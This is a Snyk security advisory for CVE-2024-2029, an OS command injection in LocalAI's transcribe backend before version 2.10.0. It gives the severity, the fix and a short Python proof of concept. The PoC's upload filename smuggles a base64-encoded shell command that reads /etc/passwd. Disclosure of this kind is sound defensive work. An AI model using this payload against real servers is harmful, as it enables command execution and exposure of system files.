Homepage
About Snyk

OS Command Injection Affecting github.com/go-skynet/localai/backend/go/transcribe package, versions <2.10.0

0.0
critical

Snyk CVSS

    Attack Complexity Low
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 0.04% (9th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-GOLANG-GITHUBCOMGOSKYNETLOCALAIBACKENDGOTRANSCRIBE-6595958
  • published 11 Apr 2024
  • disclosed 10 Apr 2024
  • credit Oussama
Report a new vulnerability Found a mistake?

Introduced: 10 Apr 2024

New CVE-2024-2029 Open this link in a new tab
CWE-78 Open this link in a new tab

How to fix?

Upgrade github.com/go-skynet/LocalAI/backend/go/transcribe to version 2.10.0 or higher.

Overview

Affected versions of this package are vulnerable to OS Command Injection due to insufficient sanitization of user-supplied filenames before being passed to ffmpeg via a shell command in the audioToWav function. An attacker can execute arbitrary commands on the host system by injecting malicious commands into the filenames. This could lead to unauthorized access, data breaches, or other detrimental impacts, depending on the privileges of the process executing the code.

PoC 

import requests

files = {
    'file': ('a;$(echo Y2F0IC9ldGMvcGFzc3dkCg==|base64 -d);', open('gb1.ogg','rb').read()),
    'model':(None, 'whisper'),
}


response = requests.post('http://localhost:8080/v1/audio/transcriptions', files=files)

print(response.text)

References